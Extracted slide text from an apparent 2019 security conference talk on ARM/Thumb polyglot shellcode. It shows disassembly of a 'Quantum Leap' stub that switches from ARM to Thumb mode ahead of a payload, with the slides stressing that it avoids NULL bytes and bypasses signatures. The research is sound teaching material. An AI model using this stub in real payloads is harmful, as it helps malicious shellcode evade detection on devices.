    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 ARM and THUMB decoding - 2 128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5 1005: 0001 0000 0000 0101 asrs r5,r0,#32 128f: 0001 0010 1000 1111 asrs r7,r1,#10 028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 028f: 0000 0010 1000 1111 lsls r7,r1,#10 USING CONDITIONAL ARM INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate No destructive instructions in Thumb mode Complimentary Conditional ARM instructions operand 1
  • 22.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Final "Quantum Leap" Code 0: 228fa019 addcs sl, pc, #25 4: 328fa015 addcc sl, pc, #21 8: 21a0400d movcs r4, sp c: 31a0400d movcc r4, sp 10: 292d0412 pushcs {r1, r4, sl} 14: 392d0412 pushcc {r1, r4, sl} 18: 28bda002 popcs {r1, sp, pc} 1c: 38bda002 popcc {r1, sp, pc} 20: REGULAR SHELLCODE FOLLOWS 22: IN THUMB MODE FROM NOW ON 0: a019 add r0, pc, #100 2: 228f movs r2, #143 4: a015 add r0, pc, #84 6: 328f adds r2, #143 8: 400d ands r5, r1 a: 21a0 movs r1, #160 c: 400d ands r5, r1 e: 31a0 adds r1, #160 10: 0412 lsls r2, r2, #16 12: 292d cmp r1, #45 14: 0412 lsls r2, r2, #16 16: 392d subs r1, #45 18: a002 add r0, pc, #8 1a: 28bd cmp r0, #189 1c: a002 add r0, pc, #8 1e: 38bd subs r0, #189 20: REGULAR SHELLCODE FOLLOWS 22: IN THUMB MODE FROM NOW ON QUANTUM LEAP: ARM TO THUMB QUANTUM LEAP: PASS THROUGH (THUMB)
  • 23.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Assembling the Quantum Leap • Took many iterations to finalise! • bx sl implemented by push {sl}, pop {pc}. • Register list proved to be a challenge. • Registers r4, sl altered in ARM. • Registers r0, r1, r2, r5 altered in Thumb. • No Thumb2 instructions. • No NULL bytes.
  • 24.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019DEMO QUANTUM LEAP SHELLCODE
  • 25.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Conclusion • ARM/Thumb Polyglot instructions offer many opportunities for OBFUSCATION and SIGNATURE bypass. • Lots of exploration opportunities in ARM shellcoding. https://github.com/therealsaumil/arm_shellcode
  • 26.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 exit(0) SNOOPCON 2019 SAUMIL SHAH @THEREALSAUMIL ★ ★